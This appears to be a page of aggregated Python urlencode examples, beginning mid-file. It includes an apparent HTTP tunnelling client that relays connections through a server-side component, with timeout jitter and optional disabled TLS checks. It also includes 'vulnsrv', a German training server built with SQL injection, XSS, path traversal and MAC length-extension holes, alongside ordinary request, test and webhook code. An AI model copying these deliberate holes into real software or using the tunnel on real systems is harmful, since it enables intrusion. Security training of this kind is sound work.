							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported an encryption failure. Verify that the encryption keys in the client and server configurations match.')
							foundResponseType = True
						if srb == conf.responseStringErrorEncryptionNotSupported:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that it does not support encryption. Verify that you are using a client configuration compatible with the server-side component.')
							foundResponseType = True
						if foundResponseType == False:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Unexpected response from server: %s' % (content))
							serverClosedConnection = True
					
					if conf.responseStringConnectionClosed in content:
						outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server explicitly closed connection ID %s' % (connectionID))
						serverClosedConnection = True
					if conf.responseStringErrorConnectionNotFound in content:
						outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that connection ID %s was not found - assuming connection has been closed.' % (connectionID))
						serverClosedConnection = True				
				except socket.error as e:
					if "timed out" not in str(e):
						raise e
						
				if trafficSent:
					scaleSocketTimeoutDown = True
					scaleSocketTimeoutUp = False
				else:
					scaleSocketTimeoutDown = False
					scaleSocketTimeoutUp = True
					
				if serverClosedConnection == True:
					runChildLoop = 0
					closeConnections = 1
					try:
						responseArray = content.split(" ")
						if len(responseArray) > 1:
							connectionID = responseArray[1]
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s' % (connectionID))
						else:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s without specifying its ID' % (connectionID))
					except:
						outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s without sending a response' % (connectionID))
						
				iterationCounter = iterationCounter + 1
				if iterationCounter > conf.statsUpdateIterations:
					outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%i bytes sent since last report' % (clientSentByteCounter))
					outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%i bytes sent since last report' % (serverSentByteCounter))
					iterationCounter = 0
					clientSentByteCounter = 0
					serverSentByteCounter = 0
					
				if runServer == 0:
					outputHandler.outputMessage('Server shutdown request received in thread for connection ID %s' % (connectionID))
					runChildLoop = 0
					closeConnections = 1
				else:
					if conf.autoscaleClientSocketTimeout:
						# scale socket timeout up/down if the criteria for doing so was met
						timeoutChange = 0.0
						#global socketTimeoutCurrent
						newSocketTimeout = socketTimeoutCurrent
						if scaleSocketTimeoutDown or scaleSocketTimeoutUp:
							timeoutChange = conf.clientSocketTimeoutScalingMultiplier * socketTimeoutCurrent
						if scaleSocketTimeoutDown:
							newSocketTimeout = conf.clientSocketTimeoutMin
						if scaleSocketTimeoutUp:
							newSocketTimeout = socketTimeoutCurrent + timeoutChange
						# make sure socket timeout is within specified range
						if newSocketTimeout < conf.clientSocketTimeoutMin:
							newSocketTimeout = conf.clientSocketTimeoutMin
						if newSocketTimeout > conf.clientSocketTimeoutMax:
							newSocketTimeout = conf.clientSocketTimeoutMax
						if newSocketTimeout != socketTimeoutCurrent:
							if conf.echoDebugMessages:
								outputHandler.outputMessage('[Connection ID %s]: Client-side socket timeout has been changed from %f to %f' % (connectionID, socketTimeoutCurrent, newSocketTimeout))
							socketTimeoutCurrent = newSocketTimeout
							
						# apply random socket timeout variation
						timeoutVar = random.uniform(clientSocketTimeoutVariationNeg, conf.clientSocketTimeoutVariation)
						timeoutModifier = (socketTimeoutCurrent * timeoutVar)
						effectiveTimeout = (socketTimeoutCurrent + timeoutModifier)
						if conf.echoDebugMessages:
							outputHandler.outputMessage('[Connection ID %s]: Applying random variation of %f to client-side socket timeout for this iteration - timeout will be %f' % (connectionID, timeoutModifier, effectiveTimeout))
							
						clientsock.settimeout(effectiveTimeout)
					

		except Exception as e:
			outputHandler.outputMessage('Connection-level exception: %s in thread for tunnel (%s -> %s -> %s)' % (e, formattedClientAddress, listeningAddress, formattedServerAddress))
			closeConnections = 1
			runChildLoop = 0
		if closeConnections == 1:
			outputHandler.outputMessage('Disengaging tunnel (%s -> %s -> %s)' % (formattedClientAddress, listeningAddress, formattedServerAddress))
			outputHandler.outputMessage('Closing client socket (%s -> %s)' % (formattedClientAddress, listeningAddress))
			try:
				clientsock.shutdown(1)
				clientsock.close()
			except Exception as e2:
				outputHandler.outputMessage('Exception while closing client socket (%s -> %s): %s' % (formattedClientAddress, listeningAddress, e2))
			plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringCloseConnection + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID
			if len(encryptionKey) > 0:
				#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringCloseConnection + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID
				ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
				if conf.accessKeyMode == "header":
					body = {conf.paramNameEncryptedBlock: ciphertextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }

			else:
				#body = {conf.paramNameOperation: conf.opModeStringCloseConnection, conf.paramNameConnectionID: connectionID }
				plaintextMessage = base64.b64encode(plaintextMessage)
				if conf.accessKeyMode == "header":
					body = {conf.paramNamePlaintextBlock: plaintextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }
			
			http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
			response, content = http.request(forwardingURL, 'POST', headers=headers, body=urllib.urlencode(body))
			content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
			cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
			headers['Cookie'] = cookieVal
			if conf.responseStringConnectionClosed in content:
				responseArray = content.split(" ")
				if len(responseArray) > 1:
					connectionID = responseArray[1]
					outputHandler.outputMessage('Server closed connection ID %s' % (connectionID))
			else:
				outputHandler.outputMessage('Error: could not close connection ID %s (may have already been closed on the server). Raw server response: %s' % (connectionID, content))
		else:
			outputHandler.outputMessage("Unexpected state: child loop exited without closeConnections being set to 1")

	except Exception as bigE:
		outputHandler.outputMessage("High-level exception: %s" % (str(bigE)))

Example 21

Project: vulnsrv
Source File: vulnsrv.py
View license
    def do_GET(self):
        reqp = _urlparse(self.path)
        try:
            getParams = query2dict(reqp.query.encode('ascii'))
        except ValueError:
            _type, e, _traceback = sys.exc_info()
            self.send_error(400, 'Invalid query format: ' + str(e))
            return
        sessionID = self._getSessionID()

        if reqp.path == '/':
            self._writeHtmlDoc(_uc('''
<ol class="mainMenu">
<li><a href="clientauth/">Client-Side Authorization Check</a></li>
<li><a href="mac/">MAC Length Extension</a></li>
<li><a href="csrf/">Cross-Site Request Forgery (CSRF)</a></li>
<li><a href="reflected_xss/?username=Benutzer%21">Reflected Cross-Site Scripting (XSS)</a></li>
<li><a href="stored_xss/?username=Benutzer%21">Stored Cross-Site Scripting (XSS)</a></li>
<li><a href="sqlinjection/">SQL Injection</a></li>
<li><a href="pathtraversal/">Path Traversal</a></li>
</ol>'''), 'vulnsrv', sessionID)
        elif reqp.path == '/clientauth/':
            js_code = html.escape('if (\'you\' != \'admin\') {alert(\'Zugriff verweigert!\'); return false;} else return true;', True)
            self._writeHtmlDoc(
                _uc('''
    <p>Finden Sie das Geheimnis heraus!</p>

    <form action="secret" method="post">
    <input type="submit" value="Geheimnis herausfinden"
    onclick="%s" />
    %s
    </form>
    ''') % (js_code, self._getCsrfTokenField(sessionID)),
                'Client-Side Authorization Check', sessionID)
        elif reqp.path == '/csrf/':
            self._writeHtmlDoc(
                _uc('''
<p>Mit dem untenstehendem Formular k&ouml;nnen Sie Nachrichten schreiben.
Erstellen Sie eine HTML-Datei <code>evil-csrf.html</code>, bei deren Aufruf der arglose Benutzer hier unfreiwillig eine &uuml;belgesinnte Nachricht hinterl&auml;sst.
</p>

<form action="send" enctype="application/x-www-form-urlencoded" method="post">
<input type="text" name="message" autofocus="autofocus" required="required" placeholder="Eine freundliche Nachricht" size="50" />
<input type="submit" value="Senden" />
</form>
''') + msgsToHtml(self.vulnState.csrfMessages), 'CSRF', sessionID)
        elif reqp.path == '/reflected_xss/':
            username = getParams.get('username', 'Unbekannter')
            self._writeHtmlDoc(_uc(
                '''<div>Hallo %s</div>
<p>Das untenstehende Formular ist gegen Cross-Site Request Forgery gesch&uuml;tzt.
Erstellen Sie eine HTML-Datei <code>evil-reflected-xss.html</code>, bei deren Aufruf der arglose Benutzer hier trotzdem unfreiwillig eine &uuml;belgesinnte Nachricht hinterl&auml;sst.
</p>

<form action="send" enctype="application/x-www-form-urlencoded" method="post">
<input type="text" name="message" autofocus="autofocus" required="required" placeholder="Eine freundliche Nachricht" size="50" />
%s
<input type="submit" value="Senden" />
</form>
''') % (_uc(username), self._getCsrfTokenField(sessionID)) + msgsToHtml(self.vulnState.reflected_xss_messages), 'Reflected XSS', sessionID)
        elif reqp.path == '/stored_xss/':
            self._writeHtmlDoc(_uc(
                '''<div>Hallo <span class="userid">%s</span></div>
<p>Das untenstehende Formular ist gegen Cross-Site Request Forgery gesch&uuml;tzt.
Sorgen Sie daf&uuml;r, dass jeder Benutzer der diese Seite aufruft unfreiwillig eine Nachricht hinterl&auml;sst, die IP und Port des Benutzers beinhaltet.
</p>

<form action="send" enctype="application/x-www-form-urlencoded" method="post">
<input type="text" name="message" autocomplete="off" autofocus="autofocus" required="required" placeholder="Eine freundliche Nachricht" size="50" />
%s
<input type="submit" value="Senden" />
</form>
%s

<script>
function show(messages_json) {
    var messages = JSON.parse(messages_json);
    var list = document.querySelector('.messages');
    messages.forEach(function(m) {
        var li = document.createElement('li');
        li.appendChild(document.createTextNode(m));
        list.appendChild(li);
    });
}

function download() {
    var xhr = new XMLHttpRequest();
    xhr.dataType = 'text';
    xhr.onload = function(e) {
        show(xhr.responseText);
    };
    xhr.open('GET', 'json');
    xhr.send();
}

function send(msg) {
    var xhr = new XMLHttpRequest();
    var token = document.querySelector('input[name="csrfToken"]').value;
    var params = 'csrfToken=' + encodeURIComponent(token) + '&message=' +encodeURIComponent(msg);
    xhr.open('POST', 'send');
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.send(params);

}

function user() {
    return document.querySelector('.userid').textContent;
}
</script>

<script>
// JSON direkt einbinden
var messages_json = '%s';
show(messages_json);

// Vorheriger Code:
// download();

</script>

<form action="clear" enctype="application/x-www-form-urlencoded" method="post">
%s
<button role="submit">Alle Nachrichten l&ouml;schen</button>
</form>

''') % (_uc(':').join(map(_uc, self.client_address)), self._getCsrfTokenField(sessionID), msgsToHtml([]), json.dumps(self.vulnState.stored_xss_messages), self._getCsrfTokenField(sessionID)), 'Stored XSS', sessionID)
        elif reqp.path == '/sqlinjection/':
            webMessages = self.vulnState.sqlQuery("SELECT id,msg FROM messages WHERE user='web'")
            self._writeHtmlDoc(_uc('''
<p>In der untenstehenden Tabelle sehen Sie die Nachrichten an den Benutzer <code>web</code>. Welche Nachrichten hat der Benutzer <code>admin</code> bekommen?</p>

<h2>Nachrichten an <code>web</code></h2>

<ul class="messages">
%s
</ul>''') % '\n'.join('<li><a href="/sqlinjection/msg?id=' + html.escape(str(row[0])) + '">' + html.escape(row[1]) + '</a></li>' for row in webMessages), 'SQL Injection', sessionID)
        elif reqp.path == '/sqlinjection/msg':
            msgNum = getParams.get('id', '')
            sql = "SELECT id,user,msg FROM messages WHERE user='web' AND id='" + msgNum + "'"
            try:
                msgs = self.vulnState.sqlQuery(sql)
                if len(msgs) == 0:
                    msg_html = '<td colspan="3">Keine web-Nachrichten gefunden</td>'
                else:
                    msg_html = '\n'.join('<tr>' + ''.join('<td>' + html.escape(str(cell)) + '</td>' for cell in row) + '</tr>' for row in msgs)
            except:
                _type, e, _traceback = sys.exc_info()
                msg_html = '<td colspan="3" class="error">' + html.escape(str(e)) + '</td>'
            self._writeHtmlDoc(('''
<table class="messages">
<thead><tr><th>ID</th><th>Benutzer</th><th>Nachricht</th></tr></thead>
%s
</table>
<p><a href="/sqlinjection/">Zur&uuml;ck zur &Uuml;bersicht</a></p>
''' % msg_html), 'Detailansicht: Nachricht ' + msgNum, sessionID)
        elif reqp.path == '/pathtraversal/':
            fileHtml = _uc('').join(
                _uc('<li><a href="get?') + html.escape(urlencode([('file', fn)])) + _uc('">') + html.escape(fn) + _uc('</a></li>\n')
                for fn in FILES['/var/www/img']['content'])
            self._writeHtmlDoc(_uc('''
<p>Welchen Unix-Account sollte ein Angreifer n&auml;her untersuchen?</p>

<p><em>Bonus-Aufgabe</em>: Was ist das Passwort des Accounts?</p>

<p>Dateien zum Download:</p>

<ul>
%s
</ul>''' % fileHtml), 'Path Traversal', sessionID)
        elif reqp.path == '/pathtraversal/get':
            fn = '/var/www/img/' + getParams.get('file', '')
            # Resolve the path.
            # If we were using a real filesystem, this would be done automatically by the OS filesystem functions, of course
            curPath = []
            for pel in fn.split('/'):
                if pel == '' or pel == '.':
                    continue
                if pel == '..':
                    if len(curPath) > 0:
                        curPath.pop()
                    # else: We're at the root, and /../ is /
                else:
                    curPath.append(pel)
            finalPath = '/' + '/'.join(curPath)
            if finalPath.endswith('/'):
                finalPath = finalPath[:-1]
            if finalPath in FILES:
                fdata = FILES[finalPath]
                if fdata['type'] == '__directory__':
                    self.send_error(404, 'Is a directory')
                else:
                    fileBlob = base64.b64decode(fdata['blob_b64'].encode('ascii'))
                    self.send_response(200)
                    self.send_header('Content-Type', fdata['type'])
                    self.send_header('Content-Length', str(len(fileBlob)))
                    self.end_headers()
                    self.wfile.write(fileBlob)
            else:
                self.send_error(404)
        elif reqp.path == '/mac/':
            cookies = self._readCookies()
            raw_cookie = cookies.get('mac_session')
            if raw_cookie is not None:
                if isinstance(raw_cookie, compat_bytes):  # Python 2.x
                    raw_cookie = raw_cookie.decode('latin1')
                mac, _, session_data_str = raw_cookie.rpartition(_uc('!'))
                session_data = session_data_str.encode('latin1')
                secret = self.vulnState.macSecret
                if hashlib.sha256(secret + session_data).hexdigest() == mac:
                    session = query2dict(session_data)
                    user = session['user']
                    timestamp = session['time']
                else:
                    user = timestamp = _uc('(Falscher MAC)')
            else:
                raw_cookie = _uc('')
                user = timestamp = _uc('(Nicht gesetzt)')

            assert isinstance(raw_cookie, _uc)
            raw_cookie_hex = binascii.b2a_hex(raw_cookie.encode('utf-8')).decode('ascii')
            assert isinstance(raw_cookie_hex, _uc)
            self._writeHtmlDoc(_uc('''
<p>Loggen Sie sich als Benutzer admin ein (ohne das Geheimnis aus dem Server-Prozess auszulesen).
Schreiben Sie daf&#x00fc;r ein Programm, das den korrekten Cookie-Wert berechnet.</p>

<form method="post" action="login">
%s
<input type="submit" value="Gast-Login" />
</form>

<h3>Aktuelle Session-Daten:</h3>

<p>Cookie (roh): <code>%s</code> (%s Bytes)</p>

<dl>
<dt>Benutzername:</dt><dd>%s</dd>
<dt>Login-Zeit:</dt><dd>%s</dd>
</dl>

<p>F&#x00fc;r den Angriff k&#x00f6;nnen Sie <a href="mac_attack.py">dieses Python-Skript</a> verwenden.
Das Skript erwartet, dass im lokalen Verzeichnis eine ausf&#x00fc;hrbare Datei ./mac_extension liegt, die mit den Argumenten <code>[Bekannter Hash]</code> <code>[Bekannte Eingabe]</code> <code>[Einzuf&#x00fc;gende Daten]</code> <code>[L&#x00e4;nge des secrets in Bytes (32)]</code> aufgerufen werden kann und das exploit zur&#x00fc;ckgibt.
</p>
      ''' % (
                self._getCsrfTokenField(sessionID),
                html.escape(raw_cookie),
                html.escape(_uc(len(raw_cookie))),
                html.escape(user),
                html.escape(timestamp)
            )), 'Length Extension-Angriffe gegen MAC', sessionID)
        elif reqp.path == '/mac/mac_attack.py':
            fdata = FILES['/mac/mac_attack.py']
            fileBlob = base64.b64decode(fdata['blob_b64'].encode('ascii'))
            self.send_response(200)
            self.send_header('Content-Type', fdata['type'])
            self.send_header('Content-Length', str(len(fileBlob)))
            self.end_headers()
            self.wfile.write(fileBlob)
        elif reqp.path == '/favicon.ico':
            self.send_response(200)
            self.send_header('Content-Type', 'image/png')
            self.send_header('Content-Length', str(len(FAVICON)))
            self.end_headers()
            self.wfile.write(FAVICON)
        elif reqp.path == '/stored_xss/json':
            self._write_json(self.vulnState.stored_xss_messages)
        else:
            self.send_error(404)
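
In the path-traversal menu above, urlencode is applied to a list of (name, value) tuples so that arbitrary file names become safe query strings inside generated links. A minimal sketch (Python 2) with made-up file names; cgi.escape stands in here for the example's html.escape.

import cgi
import urllib

file_names = ['logo.png', 'priv notes.txt', 'a&b.jpg']
for fn in file_names:
    query = urllib.urlencode([('file', fn)])      # e.g. file=priv+notes.txt
    print '<li><a href="get?%s">%s</a></li>' % (cgi.escape(query, True),
                                                cgi.escape(fn, True))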

Example 22

Project: SmartThings-Alfred
Source File: request.py
View license
    def __init__(self, url, **kwargs):
        self.request = None
        self.response = None
        self.code = -1
        self.info = {}
        self.cookieJar = None
        self.reason = ''

        data = kwargs.get('data', None)
        if data:
            if isinstance(data, dict):
                data = urllib.urlencode(data)
            if not isinstance(data, basestring):
                data = None
                raise ValueError('data must be string or dict')

        request_type = kwargs.get('type', 'POST')
        if data and isinstance(request_type, basestring) and request_type.upper()!='POST':
            url = '{}?{}'.format(url, data)
            data = None # GET data must be None

        self.request = urllib2.Request(url, data)

        # referer
        referer = kwargs.get('referer', None)
        if referer:
            self.request.add_header('referer', referer)

        # user-agent
        user_agent = kwargs.get('user_agent', None)
        if user_agent:
            self.request.add_header('User-Agent', user_agent)

        # auth
        auth = kwargs.get('auth', None)
        if auth and isinstance(auth, dict) and auth.has_key('usr'):
            auth_string = base64.b64encode('{}:{}'.format(auth.get('usr',''), auth.get('pwd','')))
            self.request.add_header('Authorization', 'Basic {}'.format(auth_string))  

        # cookie
        cookie = kwargs.get('cookie', None)
        cj = None
        if cookie:
            if isinstance(cookie, CookieJar):
                cj = cookie
            elif isinstance(cookie, dict):
                result = []
                for k, v in cookie.iteritems():
                    result.append('{}={}'.format(k, v))
                cookie = '; '.join(result)
            elif isinstance(cookie, Cookie.BaseCookie):
                cookie = cookie.output(header='')
            if isinstance(cookie, basestring):
                self.request.add_header('Cookie', cookie)
        if cj is None:
            cj = CookieJar()

        #! TODO: proxy


        # build opener
        debuglevel = 1 if kwargs.get('debug', False) else 0
        opener = urllib2.build_opener(
            urllib2.HTTPHandler(debuglevel=debuglevel),
            urllib2.HTTPSHandler(debuglevel=debuglevel),
            urllib2.HTTPCookieProcessor(cj)
            )

        # timeout
        timeout = kwargs.get('timeout')
        if not isinstance(timeout, int):
            timeout = _DEFAULT_TIMEOUT

        try:
            self.response = opener.open(self.request, timeout=timeout)
            self.code = self.response.getcode()
            self.header = self.response.info().dict
            self.cookieJar = cj
        except urllib2.HTTPError, e:
            self.code = e.code
            self.reason = '{}'.format(e)
            raise e
        except urllib2.URLError, e:
            self.code = -1
            self.reason = e.reason
            raise e
        except Exception, e:
            self.code = -1
            self.reason = '{}'.format(e)
            raise e
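
The wrapper above only form-encodes data when it is a dict, then either sends the encoded string as the POST body or appends it to the URL for non-POST requests. A minimal sketch (Python 2) with a placeholder URL:

import urllib
import urllib2

params = urllib.urlencode({'q': 'alfred', 'page': 2})

# POST: the encoded string becomes the request body.
post_request = urllib2.Request('http://example.com/api', params)

# GET: the encoded string is appended to the URL and no body is sent.
get_request = urllib2.Request('http://example.com/api?' + params)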

Example 23

View license
    def test_json_api_auth(self):
        # Harold wants to make sure that people only have JSON access to his sheets
        # when he has explicitly granted it.

        # * He logs in to Dirigible and creates a new sheet
        sheet_id = self.login_and_create_new_sheet()
        base_json_url = urljoin(self.browser.current_url, 'v0.1/json/')

        # * He enters some values and formulae
        self.enter_cell_text(1, 1, '5')

        # * He tries to use an API call to get the sheet as JSON, but gets a 403 error.
        with self.assertRaises(HTTPError) as mngr:
            urlopen(base_json_url)
        self.assertEquals(mngr.exception.code, 403)

        # * Looking around at the sheet page, he notices a "Security" button.
        self.wait_for_element_to_appear('id=id_security_button')

        # * He sees that the mouseover text on the button indicates that the JSON API is not enabled
        self.assertTrue(
            'JSON API disabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )
        self.assertTrue(
            'JSON API disabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )

        # * He clicks the button.
        self.selenium.click('id=id_security_button')

        # * A dialog appears; there is an unchecked toggle saying "Allow JSON API access"
        self.wait_for_element_visibility('id=id_security_form', True)
        self.wait_for_element_visibility('id=id_security_form_save_error', False)
        self.wait_for_element_visibility('id=id_security_form_json_enabled_checkbox', True)
        self.wait_for_element_visibility('id=id_security_form_json_api_key', True)
        self.wait_for_element_visibility('id=id_security_form_json_api_url', True)

        self.assertFalse(self.is_element_enabled('id_security_form_json_api_key'))
        self.assertFalse(self.is_element_enabled('id_security_form_json_api_url'))

        self.assertEquals(
            self.get_text('css=label[for="id_security_form_json_enabled_checkbox"]'),
            'Allow JSON API access'
        )
        self.assertEquals(self.selenium.get_value('id=id_security_form_json_enabled_checkbox'), 'off')

        # * ... and OK and Cancel buttons
        self.wait_for_element_visibility('id=id_security_form_ok_button', True)
        self.wait_for_element_visibility('id=id_security_form_cancel_button', True)

        # * He checks it.  He notices a textbox giving him an "API key",
        self.selenium.click('id=id_security_form_json_enabled_checkbox')
        self.assertTrue(self.is_element_enabled('id_security_form_json_api_key'))
        api_key = self.selenium.get_value('id=id_security_form_json_api_key')
        api_url = self.selenium.get_value('id=id_security_form_json_api_url')

        # * He also notices that when he clicks on the URL text field, the entire field is selected
        ## The focus call is to appease Chrome
        self.selenium.focus('id=id_security_form_json_api_url')
        self.selenium.click('id=id_security_form_json_api_url')

        # our 'caret' plugin appears to have a problem getting the selection
        # range for fields that are not editable, such as the json api url.
        # Consequently, we have to check the selection by copying this
        # text, and checking the clipboard content.
        with self.key_down(key_codes.CTRL):
            self.human_key_press(key_codes.LETTER_C)

        def get_clipboard_text():
            OpenClipboard()
            text = GetClipboardData(win32con.CF_TEXT)
            CloseClipboard()
            return text

        self.wait_for(
            lambda: get_clipboard_text() == api_url,
            lambda: 'bad clipboard text, was: %s' % (get_clipboard_text(),)
        )

        # * nothing appears outside the JSON API dialog box yet though.
        self.assertTrue(
            'JSON API disabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )
        self.assertTrue(
            'JSON API disabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )

        # * He ignores all of the key stuff, presses Cancel
        self.selenium.click('id=id_security_form_cancel_button')

        # * He notices that the form disappears and that the icon still indicates that the JSON API is disabled
        self.wait_for_element_visibility('id=id_security_form', False)
        self.assertTrue(
            'JSON API disabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )
        self.assertTrue(
            'JSON API disabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )

        # but he just tries accessing the JSON URL without a key again
        # * He gets 403 again.
        with self.assertRaises(HTTPError) as mngr:
            urlopen(base_json_url)
        self.assertEquals(mngr.exception.code, 403)

        # * and he also gets 403 when he uses the API Key that was displayed
        with self.assertRaises(HTTPError) as mngr:
            urlopen(base_json_url, urlencode({'api_key': api_key}))
        self.assertEquals(mngr.exception.code, 403)

        # * He half-realises what the problem is, opens the dialog again, checks the box, and presses OK
        self.selenium.click('id=id_security_button')
        self.wait_for_element_visibility('id=id_security_form', True)
        self.wait_for_element_visibility('id=id_security_form_save_error', False)
        self.assertEquals(self.selenium.get_value('id=id_security_form_json_enabled_checkbox'), 'off')
        self.selenium.click('id=id_security_form_json_enabled_checkbox')
        self.assertTrue(self.is_element_enabled('id_security_form_json_api_key'))
        self.assertTrue(self.is_element_enabled('id_security_form_json_api_url'))
        api_url = self.selenium.get_value('css=#id_security_form_json_api_url')
        self.selenium.click('id=id_security_form_ok_button')
        self.wait_for_element_visibility('id=id_security_form', False)

        #* He now sees the toolbar indicates that the JSON API is enabled for this sheet
        self.assertTrue(
            'JSON API enabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )
        self.assertTrue(
            'JSON API enabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )

        # * Not trusting the memory of his browser, he opens the dialog again
        self.selenium.click('id=id_security_button')
        self.wait_for_element_visibility('id=id_security_form', True)
        self.wait_for_element_visibility('id=id_security_form_save_error', False)
        self.assertEquals(self.selenium.get_value('id=id_security_form_json_enabled_checkbox'), 'on')

        # * and immediately presses Cancel
        self.selenium.click('id=id_security_form_cancel_button')

        # * He is surprised and delighted to see that his sheet is still JSON-enabled
        self.assertTrue(
            'JSON API enabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )
        self.assertTrue(
            'JSON API enabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )

        expected_url = "%s%s?api_key=%s" % (
            self.selenium.browserURL[:-1],
            urlparse(Url.api_url(self.get_my_username(), sheet_id)).path,
            api_key
        )
        self.assertEquals(api_url, expected_url)

        # .. despite this helpful link, he tries again with the wrong API key
        with self.assertRaises(HTTPError) as mngr:
            urlopen(base_json_url, urlencode({'api_key': 'abcd1234-123dfe'}))
        # * He gets a 403
        self.assertEquals(mngr.exception.code, 403)


        # * Frustrated, he tries again with the right API key.
        response = urlopen(base_json_url, urlencode({'api_key': api_key}))

        # * He gets the data he expected.
        json_data = json.load(response)
        self.assertEquals(json_data['1']['1'], 5)

        # * He changes the API key in the JSON API dialog.
        self.selenium.click('id=id_security_button')
        self.wait_for_element_visibility('id=id_security_form', True)
        self.wait_for_element_visibility('id=id_security_form_save_error', False)
        old_api_url = self.selenium.get_value('css=#id_security_form_json_api_url')
        self.selenium.type('id=id_security_form_json_api_key', 'some_new_api_ke')
        self.selenium.focus('id=id_security_form_json_api_key')

        # He sees that the api url is updated with every keystroke
        self.human_key_press(key_codes.END) # Move IE insert point to the end
        self.human_key_press(key_codes.LETTER_Y)

        self.assertEquals(
            self.selenium.get_value('css=#id_security_form_json_api_url'),
            old_api_url.replace(api_key, 'some_new_api_key')
        )
        self.selenium.click('id=id_security_form_ok_button')
        self.wait_for_element_visibility('id=id_security_form', False)

        # * He tries again, using the old key
        with self.assertRaises(HTTPError) as mngr:
            urlopen(base_json_url, urlencode({'api_key': api_key}))
        # * He gets a 403
        self.assertEquals(mngr.exception.code, 403)

        # * He tries using the right key.
        response = urlopen(base_json_url, urlencode({'api_key': 'some_new_api_key'}))

        # * It works.
        json_data = json.load(response)
        self.assertEquals(json_data['1']['1'], 5)

        # * He refreshes the sheet page
        self.refresh_sheet_page()

        # * and notes that his setting has been remembered by the server
        self.selenium.click('id=id_security_button')
        self.wait_for_element_visibility('id=id_security_form', True)
        self.wait_for_element_visibility('id=id_security_form_save_error', False)
        self.assertEquals(self.selenium.get_value('id=id_security_form_json_enabled_checkbox'), 'on')

        # * He makes the sheet private again.
        self.selenium.click('id=id_security_button')
        self.wait_for_element_visibility('id=id_security_form', True)
        self.wait_for_element_visibility('id=id_security_form_save_error', False)
        self.selenium.click('id=id_security_form_json_enabled_checkbox')
        self.selenium.click('id=id_security_form_ok_button')
        self.wait_for_element_visibility('id=id_security_form', False)

        # * He tries with the key that worked last time.
        with self.assertRaises(HTTPError) as mngr:
            urlopen(base_json_url, urlencode({'api_key': 'some_new_api_key'}))
        # * He gets a 403
        self.assertEquals(mngr.exception.code, 403)
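
The test above authenticates each JSON request by POSTing an api_key form field via urlopen. A minimal sketch of that call (Python 2); the URL and key are placeholders:

import json
from urllib import urlencode
from urllib2 import urlopen

base_json_url = 'http://example.com/v0.1/json/'
body = urlencode({'api_key': 'some_new_api_key'})

# Passing a data argument makes urlopen issue a POST instead of a GET.
response = urlopen(base_json_url, body)
sheet = json.load(response)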

Example 24

Project: rapidpro
Source File: models.py
View license
    @classmethod
    def trigger_flow_event(cls, webhook_url, flow, run, node_uuid, contact, event, action='POST', resthook=None):
        org = flow.org
        api_user = get_api_user()
        json_time = datetime_to_str(timezone.now())

        # get the results for this contact
        results = flow.get_results(contact)
        values = []

        if results and results[0]:
            values = results[0]['values']
            for value in values:
                value['time'] = datetime_to_str(value['time'])
                value['value'] = unicode(value['value'])

        # if the action is on the first node
        # we might not have an sms (or channel) yet
        channel = None
        text = None
        contact_urn = contact.get_urn()

        if event:
            text = event.text
            channel = event.channel
            contact_urn = event.contact_urn

        if channel:
            channel_id = channel.pk
        else:
            channel_id = -1

        steps = []
        for step in run.steps.prefetch_related('messages', 'broadcasts').order_by('arrived_on'):
            steps.append(dict(type=step.step_type,
                              node=step.step_uuid,
                              arrived_on=datetime_to_str(step.arrived_on),
                              left_on=datetime_to_str(step.left_on),
                              text=step.get_text(),
                              value=step.rule_value))

        data = dict(channel=channel_id,
                    relayer=channel_id,
                    flow=flow.id,
                    flow_name=flow.name,
                    flow_base_language=flow.base_language,
                    run=run.id,
                    text=text,
                    step=unicode(node_uuid),
                    phone=contact.get_urn_display(org=org, scheme=TEL_SCHEME, formatted=False),
                    contact=contact.uuid,
                    urn=unicode(contact_urn),
                    values=json.dumps(values),
                    steps=json.dumps(steps),
                    time=json_time)

        if not action:
            action = 'POST'

        webhook_event = WebHookEvent.objects.create(org=org,
                                                    event=FLOW,
                                                    channel=channel,
                                                    data=json.dumps(data),
                                                    try_count=1,
                                                    action=action,
                                                    resthook=resthook,
                                                    created_by=api_user,
                                                    modified_by=api_user)

        status_code = -1
        message = "None"
        body = None

        # webhook events fire immediately since we need the results back
        try:
            # only send webhooks when we are configured to, otherwise fail
